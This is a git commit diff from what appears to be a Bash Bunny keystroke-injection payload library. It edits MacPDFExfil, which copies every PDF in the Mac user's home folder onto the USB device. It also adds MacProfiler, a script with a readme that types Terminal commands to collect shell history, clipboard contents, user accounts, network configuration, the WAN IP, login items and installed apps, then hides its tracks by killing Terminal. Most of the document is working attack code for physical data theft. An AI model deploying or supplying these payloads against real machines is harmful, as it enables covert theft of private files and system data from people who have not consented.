Added MacProfiler payload (#195)

* clean up loot added sub folder so all files are not in root of loot folder * MacProfiler NewPayload for Profiling Mac systems * Make DIR
2017-04-29 19:19:19 -06:00 · 2017-04-29 19:19:19 -06:00 · 33d62ff9e9
parent a11091c5c4
commit 33d62ff9e9
3 changed files with 86 additions and 2 deletions
--- a/payloads/library/exfiltration/MacPDFExfil/payload.txt
+++ b/payloads/library/exfiltration/MacPDFExfil/payload.txt
@ -1,4 +1,4 @@
-#!/bin/bash
+#!/bin/bash
 #
 # Title:         MacPDFExfil
 # Author:        k1ul3ss
@ -14,13 +14,15 @@ ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
 dev_name="BashBunny"

 # loot directory
-lootdir="/Volumes/$dev_name/loot/"
+lootdir="/Volumes/$dev_name/loot/MacPDFExfil/"

 QUACK GUI SPACE
 QUACK DELAY 1000
 QUACK STRING terminal
 QUACK ENTER
 QUACK DELAY 3000
+QUACK STRING mkdir -p $lootdir
+QUACK ENTER
 # Find all PDFs stored in the user's home directory, and copy them over to the BashBunny storage.
 QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
 QUACK ENTER
--- a/payloads/library/recon/MacProfiler/payload.txt
+++ b/payloads/library/recon/MacProfiler/payload.txt
@ -0,0 +1,52 @@
+#!/bin/bash
+#
+# Title:         MacProfiler
+# Author:        jdetmold
+# Version:       1.0
+#
+# Creates a basic system profile for a mac computer
+# Saves all data to loot/MacProfiler/{system name}/item.txt
+#
+# Saves the following data to individule files:
+#
+#Terminal history.
+#Current clipboard contents.
+#List of users on the system.
+#ifconfig data.
+#Systems WAN IP.
+#All login items set to start up with the system.
+#List of installed Applications from /Applications.
+#
+#
+# Blue - Running
+# Green - Finished
+#
+
+LED B
+ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
+
+lootdir=/Volumes/BashBunny/loot/MacProfiler/$\(hostname\)
+
+# Start Terminal
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 2500
+
+# Save data
+QUACK STRING mkdir -p $lootdir\; history \> $lootdir/history.txt\; osascript -e \"the clipboard\" \> $lootdir/clipboard.txt\; dscl . list /Users \| grep -v '_' \> $lootdir/users.txt\; ifconfig \> $lootdir/ifconfig.txt\; curl ipecho.net/plain \> $lootdir/ExternalIP.txt\; osascript -e \'tell application \"System Events\" to get the name of every login item\' \>$lootdir/LoginItems.txt\; ls /Applications/ \> $lootdir/Applications.txt\;
+QUACK ENTER
+QUACK DELAY 1000
+
+# Eject
+QUACK STRING diskutil eject /Volumes/BashBunny/;
+QUACK ENTER
+QUACK STRING killall Terminal
+QUACK ENTER
+
+# Sync filesystem
+sync
+
+# Green LED for finished
+LED G
--- a/payloads/library/recon/MacProfiler/readme.md
+++ b/payloads/library/recon/MacProfiler/readme.md
@ -0,0 +1,30 @@
+# MacProfiler
+* Author: jdetmold
+* Version: Version 1.0
+* Target: Mac
+
+## Description
+
+Uses a HID/Storage Attack to create a system profile including the following information:
+Terminal history.
+Current clipboard contents.
+List of users on the system.
+ifconfig data.
+Systems WAN IP.
+All login items set to start up with the system.
+List of installed Applications from /Applications.
+
+## Configuration
+
+None needed. 
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Blue               | Running                                      |
+| Green              | Finished                                     |
+
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40829-payload-macprofiler/ "Hak5 Forum Thread")